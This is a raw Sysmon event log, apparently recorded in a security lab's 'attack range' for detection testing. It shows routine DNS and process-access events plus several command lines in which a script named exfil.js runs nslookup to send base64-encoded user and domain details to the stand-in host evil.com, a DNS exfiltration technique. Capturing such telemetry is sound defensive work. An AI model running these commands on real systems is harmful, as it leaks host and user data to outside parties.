354300x8000000000000000207365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{00000000-0000-0000-0000-000000000000}7340<unknown process>-udpfalsefalse127.0.0.1-50522-false127.0.0.1-53domain 354300x8000000000000000207364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50522- 354300x8000000000000000207363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.779{00000000-0000-0000-0000-000000000000}7340<unknown process>-udptruefalse127.0.0.1-50522-false127.0.0.1-53domain 354300x8000000000000000207362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.718{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62970-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62970-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000207360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50521- 354300x8000000000000000207359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{00000000-0000-0000-0000-000000000000}4936<unknown process>-udptruefalse127.0.0.1-50521-false127.0.0.1-53domain 10341000x8000000000000000207358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.308{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FE42-000000005F02}5908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x800000000000000044796Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:27.908{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=188C4E2A01D000A4C69AE22B05FDED7B,SHA256=24104AF41847D5D311949F06524414DBC4B7562984B83465D0B9CA103BC51080,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000207357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50520- 354300x8000000000000000207356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.717{00000000-0000-0000-0000-000000000000}4936<unknown process>-udptruefalse127.0.0.1-50520-false127.0.0.1-53domain 354300x8000000000000000207355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.716{00000000-0000-0000-0000-000000000000}4936<unknown process>-udpfalsefalse127.0.0.1-50519-false127.0.0.1-53domain 354300x8000000000000000207354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.716{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50519- 354300x8000000000000000207353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.716{00000000-0000-0000-0000-000000000000}4936<unknown process>-udptruefalse127.0.0.1-50519-false127.0.0.1-53domain 354300x8000000000000000207352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.076{00000000-0000-0000-0000-000000000000}2928<unknown process>-udptruefalse127.0.0.1-50494-false127.0.0.1-53domain 354300x8000000000000000207351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.002{00000000-0000-0000-0000-000000000000}7296<unknown process>-udpfalsefalse127.0.0.1-50493-false127.0.0.1-53domain 354300x8000000000000000207350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.997{00000000-0000-0000-0000-000000000000}7296<unknown process>-udptruefalse127.0.0.1-50492-false127.0.0.1-53domain 354300x8000000000000000207349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.996{00000000-0000-0000-0000-000000000000}7296<unknown process>-udpfalsefalse127.0.0.1-50491-false127.0.0.1-53domain 354300x8000000000000000207348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.996{00000000-0000-0000-0000-000000000000}7296<unknown process>-udptruefalse127.0.0.1-50491-false127.0.0.1-53domain 354300x8000000000000000207347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.926{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-50490-false127.0.0.1-53domain 354300x8000000000000000207346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.924{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-50490-false127.0.0.1-53domain 354300x8000000000000000207345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.924{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-50489-false127.0.0.1-53domain 354300x8000000000000000207344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.923{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-50489-false127.0.0.1-53domain 10341000x8000000000000000207343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FD42-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-18E0-629A-6742-000000005F02}39768036C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-FD42-000000005F02}3964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.303{2E1864BB-18E7-629A-FD42-000000005F02}3964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqsjpi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.293{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrouxlkm.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.277{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F68BBD669EFACEF4FE7F54F1941C1EDC,SHA256=040F5B9CC9A143DD05033F123CD9C1352C02C275BB4227784B52E098947C7FEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.251{2E1864BB-18E7-629A-FB42-000000005F02}60126448C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-FC42-000000005F02}6016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FC42-000000005F02}6016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.236{2E1864BB-18E7-629A-FA42-000000005F02}54087212C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-FC42-000000005F02}6016C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.247{2E1864BB-18E7-629A-FC42-000000005F02}6016C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-FA42-000000005F02}5408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrouxlkm.tmp 2>&1 10341000x8000000000000000207326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.220{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-FB42-000000005F02}6012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.220{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-FB42-000000005F02}6012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.204{2E1864BB-18E7-629A-FB42-000000005F02}60126448C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-FA42-000000005F02}5408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.189{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-FB42-000000005F02}6012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.173{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 